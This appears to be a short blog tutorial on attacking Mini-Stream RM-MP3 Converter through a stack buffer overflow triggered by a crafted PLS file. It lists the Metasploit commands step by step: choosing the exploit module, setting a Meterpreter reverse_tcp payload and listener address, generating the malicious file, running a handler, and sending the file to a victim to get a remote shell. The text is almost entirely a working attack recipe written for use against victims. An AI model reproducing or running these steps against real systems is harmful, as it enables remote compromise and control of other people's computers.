This module exploits a stack based buffer overflow found in Mini-Stream RM-MP3 Converter v3.1.2.1. The overflow is triggered when an unsuspecting victim opens the malicious PLS file.
Exploit Targets
Mini-stream RM-MP3 Converter v3.1.2
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/fileformat/mini_stream_pls_bof
Msf exploit (mini_stream_pls_bof) set payload windows/meterpreter/reverse_tcp
Msf exploit (mini_stream_pls_bof)>set lhost 192.168.1.3 (IP of Local Host)
Msf exploit (mini_stream_pls_bof)>exploit
After we successfully generate the malicious MP3, it will stored on your local computer
/root/.msf4/local/msf.pls
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
exploit
Now send your msf.pls files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer









0 komentar:
Speak up your mind
Tell us what you're thinking... !